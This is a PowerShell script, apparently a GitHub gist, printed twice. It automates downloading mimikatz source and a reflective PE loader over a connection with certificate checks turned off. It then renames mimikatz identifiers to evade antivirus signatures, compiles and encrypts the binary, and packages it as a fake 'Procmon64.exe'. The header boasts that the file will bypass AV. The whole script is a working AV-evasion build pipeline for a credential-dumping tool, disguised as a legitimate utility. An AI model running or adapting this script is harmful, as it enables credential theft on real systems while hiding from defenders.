thesubtlety/gist:5d30bc04f087807d817cf4479a481c23

## gistfile1.ps1
#requires -version 2
<#

Author: Noah
@subTee's reflexive loader

Required Dependencies: msbuild, csc

Execute: Run-UpdateKatz -Verbose

This will download the latest mimikatz source and @subTee's reflexive PE loader, unzip, compile,
encrypt, and package the mimikatz binary into Procmon64.exe. The file itself will bypass AV.
Running is a different story.

Obviously run this from a clean machine, disable AV so you don't lose mimikatz
https://stackoverflow.com/questions/25506178/getting-msbuild-exe-without-installing-visual-studio

#>

$msbuild_path = "C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\amd64\MSBuild.exe"
$cscBuildPath = "C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csc.exe"
$utilName = "Procmon64.exe"

function Get-MimiAndKatz {
    [CmdletBinding()] Param()

    Write-Verbose "Downloading mimi katz and katz2.0..."

    $Domain = ""
    $User = ""
    $Password = ""

    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
    #$proxy = [Net.WebRequest]::GetSystemWebProxy()
    #$credCache = [Net.CredentialCache]::new()
    #$netCreds = [Net.NetworkCredential]::new("$User","$Password","$Domain")
    #$credCache.Add([Net.WebProxy]::GetDefaultProxy().Address, "Basic", $netCreds)
    #$proxy.Credentials = $credCache

    $webClient = New-Object System.NET.WebClient
    #$webClient.Proxy = $proxy
    $webClient.Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3578.108 Safari/537.36")
    $mimiURL = "https://github.com/gentilkiwi/mimikatz/archive/master.zip"
    $destMimi = (Get-Location).Path + "\mimikatz-master.zip"

    $webClient.DownloadFile($mimiURL, $destMimi)

    $katzURL = "https://raw.githubusercontent.com/thesubtlety/Utils/master/katz2.0.cs"
    $destKatz = (Get-Location).Path + "\katz2.0.cs"
    $webClient.DownloadFile($katzURL, $destKatz)

    Write-Verbose "Saving to `n`t$destKatz `n`t$destMimi"

    Unzip $destMimi ($destMimi -replace ".zip")
}

# Required for posh <v5
Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip {
    param([string]$zipfile, [string]$outpath)
    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}

function PrepareBuild-Mimi{
    [CmdletBinding()] Param()

    Write-Verbose "Renaming things..."

    $mimipath = (get-location).path + "\mimikatz-master\mimikatz-master"
    $allfiles = Get-ChildItem $mimipath -recurse | Where-Object { $_.Attributes -notmatch 'directory' } | `
                                                   Where-Object { $_.Extension -match '\.c|\.cs|\.cmd|\.def|\.filters|\.h|\.idl|\.rc|\.sln|\.tlog|\.vcxproj|\.yar'  }

   foreach ($file in $allfiles) {
        (Get-Content $file.PSPath) | `
        ForEach-Object { $_ -replace "mimikatz", "mimidogz" `
                            -replace "kiwi", "fruity" `
                            -replace "delpy", "french" `
                            -replace "gentilkiwi", "gentle" `
                            -replace "Build with love", "" `
                            -replace "vincent", "vinny" `
                            } | `
        Set-Content $file.PSPath
    }
    #Get-ChildItem -recurse $mimipath |  Rename-Item -NewName { $_.name -replace "mimikatz", "mimidogz" }
    Get-ChildItem -recurse $mimipath | Where-Object { $_.name -match "mimikatz" } | Rename-Item -NewName { $_.name -replace "mimikatz", "mimidogz" }

    Write-Verbose "Building mimikatz..."
    iex "cmd /c `"$msbuild_path`" `"$mimipath\mimidogz.sln`" /t:Build /p:Configuration=Release /p:Platform=x64 "
}

function Build-Katz($katzPath) {

    Write-Verbose "Building Katz2.0..."

    IEX "cmd /c `"$cscBuildPath`" /t:exe /out:$utilName /unsafe $katzPath"
    #$c = '"$cscBuildPath" "/t:exe /out:$utilName /unsafe $katzPath"'
    #iex "& $c"
}

function PrepareBuild-Katz {

    Write-Verbose "Fixing up defaults..."

    $katzPath = (Get-Location).Path + "\katz2.0.cs"
    (Get-Content $katzPath) -replace "`"password`"", "`"WaitForSingleObject`"" | Set-Content $katzPath

    Build-Katz($katzPath)
}

function Encrypt-Mimi {
    [CmdletBinding()] Param()

    Write-Verbose "Encrypting mimikatz with katz2..."

    $katzPath = (Get-Location).Path + "\katz2.0.cs"
    $mimiexePath = (Get-Location).path + "\mimikatz-master\mimikatz-master\x64\mimidogz.exe"
    $out = IEX "cmd /c .\$utilName encrypt $mimiexePath"

    (Get-Content $katzPath) -replace "INSERT B64 HERE", $out | Set-Content $katzPath
    Build-Katz($katzPath)

    Write-Verbose "Done... Run $utilname..."
}

function Run-UpdateKatz {
    [CmdletBinding()] Param()

    Get-MimiAndKatz
    PrepareBuild-Mimi
    PrepareBuild-Katz
    Encrypt-Mimi
}
	#requires -version 2
	<#

	Author: Noah
	@subTee's reflexive loader

	Required Dependencies: msbuild, csc

	Execute: Run-UpdateKatz -Verbose

	This will download the latest mimikatz source and @subTee's reflexive PE loader, unzip, compile,
	encrypt, and package the mimikatz binary into Procmon64.exe. The file itself will bypass AV.
	Running is a different story.

	Obviously run this from a clean machine, disable AV so you don't lose mimikatz
	https://stackoverflow.com/questions/25506178/getting-msbuild-exe-without-installing-visual-studio

	#>

	$msbuild_path = "C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\amd64\MSBuild.exe"
	$cscBuildPath = "C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csc.exe"
	$utilName = "Procmon64.exe"

	function Get-MimiAndKatz {
	[CmdletBinding()] Param()

	Write-Verbose "Downloading mimi katz and katz2.0..."

	$Domain = ""
	$User = ""
	$Password = ""

	[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
	#$proxy = [Net.WebRequest]::GetSystemWebProxy()
	#$credCache = [Net.CredentialCache]::new()
	#$netCreds = [Net.NetworkCredential]::new("$User","$Password","$Domain")
	#$credCache.Add([Net.WebProxy]::GetDefaultProxy().Address, "Basic", $netCreds)
	#$proxy.Credentials = $credCache

	$webClient = New-Object System.NET.WebClient
	#$webClient.Proxy = $proxy
	$webClient.Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3578.108 Safari/537.36")
	$mimiURL = "https://github.com/gentilkiwi/mimikatz/archive/master.zip"
	$destMimi = (Get-Location).Path + "\mimikatz-master.zip"

	$webClient.DownloadFile($mimiURL, $destMimi)

	$katzURL = "https://raw.githubusercontent.com/thesubtlety/Utils/master/katz2.0.cs"
	$destKatz = (Get-Location).Path + "\katz2.0.cs"
	$webClient.DownloadFile($katzURL, $destKatz)

	Write-Verbose "Saving to `n`t$destKatz `n`t$destMimi"

	Unzip $destMimi ($destMimi -replace ".zip")
	}

	# Required for posh <v5
	Add-Type -AssemblyName System.IO.Compression.FileSystem
	function Unzip {
	param([string]$zipfile, [string]$outpath)
	[System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
	}

	function PrepareBuild-Mimi{
	[CmdletBinding()] Param()

	Write-Verbose "Renaming things..."

	$mimipath = (get-location).path + "\mimikatz-master\mimikatz-master"
	$allfiles = Get-ChildItem $mimipath -recurse \| Where-Object { $_.Attributes -notmatch 'directory' } \| `
	Where-Object { $_.Extension -match '\.c\|\.cs\|\.cmd\|\.def\|\.filters\|\.h\|\.idl\|\.rc\|\.sln\|\.tlog\|\.vcxproj\|\.yar' }

	foreach ($file in $allfiles) {
	(Get-Content $file.PSPath) \| `
	ForEach-Object { $_ -replace "mimikatz", "mimidogz" `
	-replace "kiwi", "fruity" `
	-replace "delpy", "french" `
	-replace "gentilkiwi", "gentle" `
	-replace "Build with love", "" `
	-replace "vincent", "vinny" `
	} \| `
	Set-Content $file.PSPath
	}
	#Get-ChildItem -recurse $mimipath \| Rename-Item -NewName { $_.name -replace "mimikatz", "mimidogz" }
	Get-ChildItem -recurse $mimipath \| Where-Object { $_.name -match "mimikatz" } \| Rename-Item -NewName { $_.name -replace "mimikatz", "mimidogz" }

	Write-Verbose "Building mimikatz..."
	iex "cmd /c `"$msbuild_path`" `"$mimipath\mimidogz.sln`" /t:Build /p:Configuration=Release /p:Platform=x64 "
	}

	function Build-Katz($katzPath) {

	Write-Verbose "Building Katz2.0..."

	IEX "cmd /c `"$cscBuildPath`" /t:exe /out:$utilName /unsafe $katzPath"
	#$c = '"$cscBuildPath" "/t:exe /out:$utilName /unsafe $katzPath"'
	#iex "& $c"
	}

	function PrepareBuild-Katz {

	Write-Verbose "Fixing up defaults..."

	$katzPath = (Get-Location).Path + "\katz2.0.cs"
	(Get-Content $katzPath) -replace "`"password`"", "`"WaitForSingleObject`"" \| Set-Content $katzPath

	Build-Katz($katzPath)
	}

	function Encrypt-Mimi {
	[CmdletBinding()] Param()

	Write-Verbose "Encrypting mimikatz with katz2..."

	$katzPath = (Get-Location).Path + "\katz2.0.cs"
	$mimiexePath = (Get-Location).path + "\mimikatz-master\mimikatz-master\x64\mimidogz.exe"
	$out = IEX "cmd /c .\$utilName encrypt $mimiexePath"

	(Get-Content $katzPath) -replace "INSERT B64 HERE", $out \| Set-Content $katzPath
	Build-Katz($katzPath)

	Write-Verbose "Done... Run $utilname..."
	}

	function Run-UpdateKatz {
	[CmdletBinding()] Param()

	Get-MimiAndKatz
	PrepareBuild-Mimi
	PrepareBuild-Katz
	Encrypt-Mimi
	}